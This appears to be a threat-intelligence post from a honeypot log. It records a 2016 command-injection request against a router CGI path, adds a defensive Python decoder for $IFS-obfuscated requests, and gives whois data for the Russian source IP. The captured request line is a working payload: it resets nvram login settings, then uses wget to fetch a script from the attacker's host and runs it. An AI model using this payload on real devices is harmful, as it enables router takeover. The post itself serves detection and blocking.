BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080
END OF DATA
The ug.sh script tries to download a binary file.
Judging by the xxd and strings output of the file, it looks like a DD-WRT firmware file.
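For triaging requests like the one captured above, the following Python (an added example, not part of the original post) undoes the `$IFS`/backslash obfuscation in a request line and lists the injected shell commands, the nvram changes and any download URL. The sample request lines are constructed for illustration and use the documentation address 192.0.2.10; the function and field names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines, modelled on the capture above.
SAMPLES = [
    r"GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\commit;cd$IFS\/tmp;wget$IFS\http:\/\/192.0.2.10:8081\/x.sh;/bin/sh$IFS\/tmp/x.sh HTTP/1.0",
    "GET /cgi-bin/status.cgi?lang=en HTTP/1.1",
]

# $IFS or ${IFS} stands in for a space, which cannot appear in a request target.
IFS_RE = re.compile(r"\$\{?IFS\}?")
URL_RE = re.compile(r"https?://[^\s;]+")


def analyse(request_line):
    """Return None for a request without $IFS, else a dict describing the injection."""
    # Split off the method and the HTTP version; the target itself may contain spaces.
    _, _, rest = request_line.partition(" ")
    target, _, _ = rest.rpartition(" ")
    target = unquote(target)
    if not IFS_RE.search(target):
        return None
    # Undo the obfuscation: $IFS becomes a space. The backslashes only end the
    # variable name ($IFS\set) or escape a slash, so they are dropped.
    shell = IFS_RE.sub(" ", target).replace("\\", "")
    prefix, _, injected = shell.partition(";")
    commands = [c.strip() for c in injected.split(";") if c.strip()]
    return {
        "cgi_path": prefix,
        "commands": commands,
        # nvram set/commit changes persistent router settings such as the web login.
        "nvram_writes": [c for c in commands
                         if c.startswith("nvram set") or c == "nvram commit"],
        "download_urls": URL_RE.findall(shell),
    }


if __name__ == "__main__":
    for line in SAMPLES:
        print(analyse(line))
```
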
Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.
Disclaimer: This information is provided as-is and there is no guarantee that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided at your own risk;
the author disclaims all warranty and shall not be liable for any damage
or impact caused.
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois